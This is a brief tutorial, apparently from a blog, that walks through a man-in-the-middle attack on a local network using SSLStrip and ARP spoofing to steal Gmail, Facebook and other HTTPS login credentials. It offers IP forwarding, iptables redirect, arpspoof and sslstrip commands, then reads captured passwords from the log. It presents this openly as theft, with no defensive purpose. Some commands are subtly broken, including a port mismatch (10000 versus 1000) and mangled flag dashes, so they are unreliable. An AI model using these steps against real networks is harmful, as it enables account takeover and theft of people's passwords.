SSLStrip can be used to steal gmail, facebook… (any https site) credentials in LAN. Backtrack comes with a pre-installed SSLStrip.
Below steps explain the usage of SSLStrip to steal the credentials.
Attacker: Backtrack 4 linux machine
Victim: windows xp machine
On Backtrack 4 terminal,
- echo 1 > /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
- arpspoof -i eth0 -t victimip routerip
On other terminal:
- sslstrip -l 1000
If you are using Backtrack 5, then do the following to start SSLStrip.
- Go to start->info gathering->web app tools->ssl analysys->sslstrip
- chmod +x sslstrip.py
- Python sslstrip.py -l 1000
Now in windows xp machine, open a browser (IE). Type gmail and hit cntrl+enter.
Type username and password to log into your gmail.
By this time SSLStrip captures the credentials and stores it in sslstrip.log file. To view the log
On backtrack terminal:
- cat sslstrip.log
To understand it in a better way watch this video -
